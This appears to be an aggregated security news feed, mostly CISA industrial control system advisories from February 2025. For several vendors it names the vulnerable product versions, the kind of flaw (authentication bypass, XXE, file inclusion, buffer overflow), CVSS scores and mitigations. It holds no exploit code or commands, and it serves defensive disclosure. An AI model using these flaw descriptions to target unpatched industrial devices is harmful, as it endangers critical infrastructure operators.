Modicon M340 and BMXNOE0100/0110, BMXNOR0200H communication modules" CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. 5. UPDATE HISTORY February 4, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-035-06
CISA Partners with ASD’s ACSC, CCCS, NCSC-UK, and Other International and US Organizations to Release Guidance on Edge Devices
2025-02-04T12:00:00Z | 1738670400

CISA—in partnership with international and U.S. organizations—released guidance to help organizations protect their network edge devices and appliances, such as firewalls, routers, virtual private networks (VPN) gateways, Internet of Things (IoT) devices, internet-facing servers, and internet-facing operational technology (OT) systems. The published guidance is as follows: “Security Considerations for Edge Devices,” led by the Canadian Centre for Cyber Security (CCCS), a part of the Communications Security Establishment Canada. “Digital Forensics Monitoring Specifications for Products of Network Devices and Applications,” led by the United Kingdom’s National Cyber Security Centre (NCSC-UK). “Mitigation Strategies for Edge Devices: Executive Guidance” and “Mitigation Strategies for Edge Devices: Practitioner Guidance,” two separate guides led by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC). Foreign adversaries routinely exploit software vulnerabilities in network edge devices to infiltrate critical infrastructure networks and systems. The damage can be expensive, time-consuming, and reputationally catastrophic for public and private sector organizations. These guidance documents detail various considerations and strategies for a more secure and resilient network both before and after a compromise. CISA and partner agencies urge device manufacturers and critical infrastructure owners and operators to review and implement the recommended actions and mitigations in the publications. Device manufacturers, please visit CISA’s Secure by Design page for more information on how to align development processes with the goal of reducing the prevalence of vulnerabilities in devices. Critical infrastructure owners and operators, please see Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products for guidance on procuring secure products.

https://www.cisa.gov/news-events/alerts/2025/02/04/cisa-partners-asds-acsc-cccs-ncsc-uk-and-other-international-and-us-organizations-release-guidance
Rockwell Automation 1756-L8zS3 and 1756-L3zS3
2025-02-04T12:00:00Z | 1738670400

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 7.1 ATTENTION: Exploitable remotely/low attack complexity Vendor: Rockwell Automation Equipment: 1756-L8zS3, 1756-L3zS3 Vulnerability: Improper Handling of Exceptional Conditions 2. RISK EVALUATION Successful exploitation of this vulnerability could allow a remote, non-privileged user to send malicious requests resulting in a major nonrecoverable fault causing a denial-of-service condition. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following Rockwell Automation products are affected: 1756-L8zS3: Versions prior to V33.017, V34.014, V35.013, V36.011 1756-L3zS3: Versions prior to V33.017, V34.014, V35.013, V36.011 3.2 VULNERABILITY OVERVIEW 3.2.1 Improper Handling of Exceptional Conditions CWE-755 A denial-of-service vulnerability exists in the affected products. The vulnerability could allow a remote, non-privileged user to send malicious requests resulting in a major nonrecoverable fault causing a denial-of-service. CVE-2025-24478 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). A CVSS v4 score has also been calculated for CVE-2025-24478. A base score of 7.1 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: United States 3.4 RESEARCHER Rockwell Automation reported this vulnerability to CISA. 4. MITIGATIONS Rockwell Automation recommends users of the affected software to apply the risk mitigations, if possible. Update to V33.017, V34.014, V35.013, V36.011, or the latest version. Restrict Access to the task object via CIP Security and Hard Run. For information on how to mitigate security risks on industrial automation control systems, Rockwell Automation encourages users to implement our suggested security best practices to minimize the risk of the vulnerability. Stakeholder-Specific Vulnerability Categorization can be used to generate more environment-specific prioritization. For more information about this issue, please see the advisory on the Rockwell Automation security page. CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as: Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. 5. UPDATE HISTORY February 4, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-035-02
CISA Adds Four Known Exploited Vulnerabilities to Catalog
2025-02-04T12:00:00Z | 1738670400

CISA has added four new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-45195 Apache OFBiz Forced Browsing Vulnerability CVE-2024-29059 Microsoft .NET Framework Information Disclosure Vulnerability CVE-2018-9276 Paessler PRTG Network Monitor OS Command Injection Vulnerability CVE-2018-19410 Paessler PRTG Network Monitor Local File Inclusion Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

https://www.cisa.gov/news-events/alerts/2025/02/04/cisa-adds-four-known-exploited-vulnerabilities-catalog
Schneider Electric Web Designer for Modicon
2025-02-04T12:00:00Z | 1738670400

View CSAF 1. EXECUTIVE SUMMARY CVSS v3 7.8 ATTENTION: Low attack complexity Vendor: Schneider Electric Equipment: Web Designer for Modicon Vulnerability: Improper Restriction of XML External Entity Reference 2. RISK EVALUATION Successful exploitation of this vulnerability could result in information disclosure, workstation integrity and potential remote code execution on the compromised computer. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Web Designer for Modicon are affected: Web Designer for BMXNOR0200H: All versions Web Designer for BMXNOE0110(H): All versions Web Designer for BMENOC0311(C): All versions Web Designer for BMENOC0321(C): All versions 3.2 VULNERABILITY OVERVIEW 3.2.1 IMPROPER RESTRICTION OF XML EXTERNAL ENTITY REFERENCE CWE-611 The affected product is vulnerable to an improper restriction of XML external entity reference vulnerability that could cause information disclosure, impacts to workstation integrity, and potential remote code execution on the compromised computer when a specifically crafted XML file is imported in the Web Designer configuration tool. CVE-2024-12476 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Energy, Food and Agriculture, Government Facilities, Transportation Systems, Water and Wastewater Systems COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: France 3.4 RESEARCHER Jin Huang of ADLab of Venustech reported this vulnerability Schneider Electric. 4. MITIGATIONS Web Designer tool project file is based on XML language with specific parameters. To ensure the integrity of this file please follow the recommendations below: Encrypt project file (XML configuration file) when stored and restrict the access to only trusted users. When exchanging files over the network, use secure communication protocols. Only open project files received from a trusted source. Compute a hash of the project files and regularly check the consistency of this hash to verify the integrity before usage. To ensure you are informed of all updates, including details on affected products and remediation plans, subscribe to Schneider Electric's security notification service here: https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp Schneider Electric strongly recommends the following industry cybersecurity best practices. Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network. Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks. Place all controllers in locked cabinets and never leave them in the "Program" mode. Never connect programming software to any network other than the network intended for that device. Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks. Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation. Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have their own vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document. For more information, see Schneider Electric security notification "SEVD-2025-014-04 Web Server on Modicon M340 and BMXNOE0100/0110, BMXNOR0200H communication modules" CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. 5. UPDATE HISTORY February 4, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-035-05
CISA Releases Nine Industrial Control Systems Advisories
2025-02-04T12:00:00Z | 1738670400

CISA released nine Industrial Control Systems (ICS) advisories on February 4, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-035-01 Western Telematic Inc NPS Series, DSM Series, CPM Series ICSA-25-035-02 Rockwell Automation 1756-L8zS3 and 1756-L3zS3 ICSA-25-035-03 Elber Communications Equipment ICSA-25-035-04 Schneider Electric Modicon M580 PLCs, BMENOR2200H and EVLink Pro AC ICSA-25-035-05 Schneider Electric Web Designer for Modicon ICSA-25-035-06 Schneider Electric Modicon M340 and BMXNOE0100/0110, BMXNOR0200H ICSA-25-035-07 Schneider Electric Pro-face GP-Pro EX and Remote HMI ICSA-25-035-08 AutomationDirect C-more EA9 HMI ICSA-23-299-03 Ashlar-Vellum Cobalt, Graphite, Xenon, Argon, Lithium (Update A) CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

https://www.cisa.gov/news-events/alerts/2025/02/04/cisa-releases-nine-industrial-control-systems-advisories
Elber Communications Equipment
2025-02-04T12:00:00Z | 1738670400

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 9.3 ATTENTION: Exploitable remotely/low attack complexity/public exploits are available Vendor: Elber Equipment: Communications Equipment Vulnerabilities: Authentication Bypass Using an Alternate Path or Channel, Hidden Functionality 2. RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker unauthorized administrative access to the affected device. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Elber Communications Equipment are affected: Signum DVB-S/S2 IRD: Versions 1.999 and prior Cleber/3 Broadcast Multi-Purpose Platform: Version 1.0 Reble610 M/ODU XPIC IP-ASI-SDH: Version 0.01 ESE DVB-S/S2 Satellite Receiver: Versions 1.5.179 and prior Wayber Analog/Digital Audio STL: Version 4 3.2 VULNERABILITY OVERVIEW 3.2.1 Authentication Bypass Using an Alternate Path or Channel CWE-288 Multiple Elber products are affected by an authentication bypass vulnerability which allows unauthorized access to the password management functionality. Attackers can exploit this issue by manipulating the endpoint to overwrite any user's password within the system. This grants them unauthorized administrative access to protected areas of the application, compromising the device's system security. CVE-2025-0674 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2025-0674. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.2.2 Hidden Functionality CWE-912 Multiple Elber products suffer from an unauthenticated device configuration and client-side hidden functionality disclosure. CVE-2025-0675 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). A CVSS v4 score has also been calculated for CVE-2025-0675. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Communications COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: Italy 3.4 RESEARCHER Gjoko Krstic of Zero Science Lab reported these vulnerabilities to CISA. 4. MITIGATIONS Elber does not plan to mitigate these vulnerabilities because this equipment is either end of life or almost end of life. Users of affected versions of Elber Signum DVB-S/S2 IRD, Cleber/3 Broadcast Multi-Purpose Platform, Reble610 M/ODU XPIC IP-ASI-SDH, ESE DVB-S/S2 Satellite Receiver, and Wayber Analog/Digital Audio STL are invited to contact Elber customer support for additional information. CISA recommends users take defensive measures to minimize the risk of exploitation of this these vulnerabilities, such as: Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. 5. UPDATE HISTORY February 4, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-035-03
Schneider Electric Pro-face GP-Pro EX and Remote HMI
2025-02-04T12:00:00Z | 1738670400

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 6.1 ATTENTION: Exploitable remotely Vendor: Schneider Electric Equipment: Pro-face GP-Pro EX and Remote HMI Vulnerability: Improper Enforcement of Message Integrity During Transmission in a Communication Channel 2. RISK EVALUATION Successful exploitation of this vulnerability could allow man-in-the-middle attacks, resulting in information disclosure, integrity issues, and operational failures. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Pro-face GP-Pro EX and Remote HMI are affected: Pro-face GP-Pro EX: All versions Pro-face Remote HMI: All versions 3.2 VULNERABILITY OVERVIEW 3.2.1 IMPROPER ENFORCEMENT OF MESSAGE INTEGRITY DURING TRANSMISSION IN A COMMUNICATION CHANNEL CWE-924 The affected products are vulnerable to an improper enforcement of message integrity during transmission in a communication channel vulnerability that could cause partial loss of confidentiality, loss of integrity, and availability of the HMI when attacker performs man-in-the-middle attack by intercepting the communication. CVE-2024-12399 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.1 has been calculated; the CVSS vector string is (AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2024-12399. A base score of 6.1 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Energy COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: France 3.4 RESEARCHER Haichuan Xu from the Georgia Institute of Technology reported this vulnerability to Schneider Electric. 4. MITIGATIONS Schneider Electric is establishing a remediation plan for all future versions of Pro-face GP-Pro EX and Pro-face Remote HMI that will include a fix for this vulnerability. Schneider Electric will provide an update when the remediation is available. Until then, users should immediately apply the following mitigations to reduce the risk of exploit: For users requiring the use of Pro-face Remote HMI, Schneider Electric recommends using following mitigations: Use of Pro-face Connect solution or any other VPN solutions for securing the remote access by encrypting the communication between Pro-face Remote HMI and Pro-face GP-ProEX. Always connect the products to only trusted networks and follow the Pro-face Cybersecurity Guidelines. Set up a connection password. For more details refer to the GP-Pro EX V4.0 Reference Manual in section "Remote Viewer - Pro-face Remote HMI". For users not using the Pro-face Remote HMI, Schneider Electric recommends using following mitigations to reduce the risk of exploit: Disabling the Pro-face Remote HMI feature (deactivated by default). For more details refer to the GP-Pro EX V4.0 Reference Manual section "Pro-face Remote HMI Settings." Schneider Electric strongly recommends the following industry cybersecurity best practices. Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network. Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks. Place all controllers in locked cabinets and never leave them in the "Program" mode. Never connect programming software to any network other than the network intended for that device. Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks. Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation. Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document. For more information, see Schneider Electric security notification "SEVD-2025-014-02 Schneider Electric Security Notification Pro-face GP-Pro EX and Remote HMI" CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. 5. UPDATE HISTORY February 4, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-035-07
Western Telematic Inc NPS Series, DSM Series, CPM Series
2025-02-04T12:00:00Z | 1738670400

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 6.0 ATTENTION: Exploitable remotely/low attack complexity Vendor: Western Telematic Inc Equipment: NPS Series, DSM Series, CPM Series Vulnerability: External Control of File Name or Path 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an authenticated attacker to gain privileged access to files on the device's filesystem. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following Western Telematic Inc products are affected: Network Power Switch (NPS Series): Firmware Version 6.62 and prior Console Server (DSM Series): Firmware Version 6.62 and prior Console Server + PDU Combo Unit (CPM Series): Firmware Version 6.62 and prior 3.2 VULNERABILITY OVERVIEW 3.2.1 External Control of File Name or Path CWE-73 Multiple Western Telematic (WTI) products contain a web interface that is vulnerable to a Local File Inclusion Attack (LFI), where any authenticated user has privileged access to files on the device's filesystem. CVE-2025-0630 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). A CVSS v4 score has also been calculated for CVE-2025-0630. A base score of 6.0 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Communications COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: United States 3.4 RESEARCHER notnotnotveg (notnotnotveg@gmail.com) reported this vulnerability to CISA. 4. MITIGATIONS Western Telematic Inc reports this issue was discovered and patched in 2020. Western Telematic Inc recommends users follow best practices and update to the latest version. For DSM/CPM units: Update to 8.06 For NPS units: Update 4.02 Ensure the default passwords are changed prior to deployment CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as: Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. 5. UPDATE HISTORY February 4, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-035-01
AutomationDirect C-more EA9 HMI
2025-02-04T12:00:00Z | 1738670400

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 9.3 ATTENTION: Exploitable remotely/low attack complexity Vendor: AutomationDirect Equipment: C-more EA9 HMI Vulnerability: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to cause a denial-of-service condition or achieve remote code execution on the affected device. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following Automation Direct products are affected: C-more EA9 HMI EA9-T6CL: v6.79 and prior C-more EA9 HMI EA9-T7CL-R: v6.79 and prior C-more EA9 HMI EA9-T7CL: v6.79 and prior C-more EA9 HMI EA9-T8CL: v6.79 and prior C-more EA9 HMI EA9-T10CL: v6.79 and prior C-more EA9 HMI EA9-T10WCL: v6.79 and prior C-more EA9 HMI EA9-T12CL: v6.79 and prior C-more EA9 HMI EA9-T15CL-R: v6.79 and prior C-more EA9 HMI EA9-T15CL: v6.79 and prior C-more EA9 HMI EA9-RHMI: v6.79 and prior 3.2 VULNERABILITY OVERVIEW 3.2.1 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') CWE-120 AutomationDirect C-more EA9 HMI contains a function with bounds checks that can be skipped, which could result in an attacker abusing the function to cause a denial-of-service condition or achieving remote code execution on the affected device. CVE-2025-0960 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2025-0960. A base score of 9.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: United States 3.4 RESEARCHER Sharon Brizinov of Claroty Team82 reported this vulnerability to CISA. 4. MITIGATIONS AutomationDirect recommends that users update C-MORE EA9 HMI software and firmware to V6.80. If an immediate update is not feasible, AutomationDirect recommends considering the following interim steps until the programming software can be updated: Isolate the HMI Workstation: Disconnect the HMI from external networks (e.g., internet or corporate LAN) to limit exposure to external threats. Use dedicated, secure internal networks or air-gapped systems for communication with programmable devices. Control Access: Restrict physical and logical access to the HMI to authorized personnel only. Implement Whitelisting: Use application whitelisting to allow only pre-approved and trusted software to execute on the HMI. Block untrusted or unauthorized applications. Apply Endpoint Security Measures: Use antivirus or endpoint detection and response (EDR) tools to monitor for and mitigate threats. Ensure that host-based firewalls are properly configured to block unauthorized access. Monitor and Log Activity: Enable logging and monitoring of system activities to detect potential anomalies or unauthorized actions. Regularly review logs for suspicious activity. Use Secure Backup and Recovery: Regularly back up the workstation and its configurations to a secure location. Test recovery procedures to ensure minimal downtime in the event of an incident. Conduct Regular Risk Assessments: Continuously assess the risks posed by the outdated software and adjust mitigation measures as necessary. For more information, please see the AutomationDirect security advisory. CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as: When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. 5. UPDATE HISTORY February 4, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-035-08
8 Million Requests Later, We Made The SolarWinds Supply Chain Attack Look Amateur
2025-02-04T11:00:08Z | 1738666808

Surprise surprise, we've done it again. We've demonstrated an ability to compromise significantly sensitive networks, including governments, militaries, space agencies, cyber security companies, supply chains, software development systems and environments, and more.“Ugh, won’t they just stick to creating poor-quality memes?” we

https://labs.watchtowr.com/8-million-requests-later-we-made-the-solarwinds-supply-chain-attack-look-amateur/
Vulnerability in authentik software
2025-02-04T11:00:00Z | 1738666800

Stored XSS (Cross-site Scripting) vulnerability has been found in authentik software.

https://cert.pl/en/posts/2025/02/CVE-2024-11623/
Security Alert (A25-02-03): Multiple Vulnerabilities in Android
2025-02-04T04:00:00Z | 1738641600

Google has released Android Security Bulletin February 2025 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
未公開のカーネルデータ構造を使ったホットキー型キーロガーの検知
2025-02-04T00:00:00Z | 1738627200

本記事では、ホットキー型キーロガーとは何かについてと、その検知方法について紹介します。具体的には、ホットキー型キーロガーがどのようにしてキー入力を盗み取るのかを解説した後、カーネルレベルに存在する未公開(Undocumented)のホットキーテーブルを活用した検知手法について説明します。

https://www.elastic.co/security-labs/detecting-hotkey-based-keyloggers-jp
Security alert CVE-2025-0282: Stormshield Products Response
2025-02-03T19:17:04Z | 1738610224

A critical vulnerability impacting Ivanti softwares Connect Secure, Neurons for Zero Trust Access and Policy Secure has been reported. It has been assigned the reference CVE-2025-0282 and a CVSS 3.1 score of 9.0.  It should be noted that proof of concept of this CVE-2025-0282 vulnerability... The post Security alert CVE-2025-0282: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-cve-2025-0282-stormshield-products-response/
Security alert CVE-2025-0282: Stormshield Products Response
2025-02-03T19:17:04Z | 1738610224

A critical vulnerability impacting Ivanti softwares Connect Secure, Neurons for Zero Trust Access and Policy Secure has been reported. It has been assigned the reference CVE-2025-0282 and a CVSS 3.1 score of 9.0.  It should be noted that proof of concept of this CVE-2025-0282 vulnerability... The post Security alert CVE-2025-0282: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-cve-2025-0282-stormshield-products-response/
Building resilience, in tech, skills, and security
2025-02-03T17:09:00Z | 1738602540

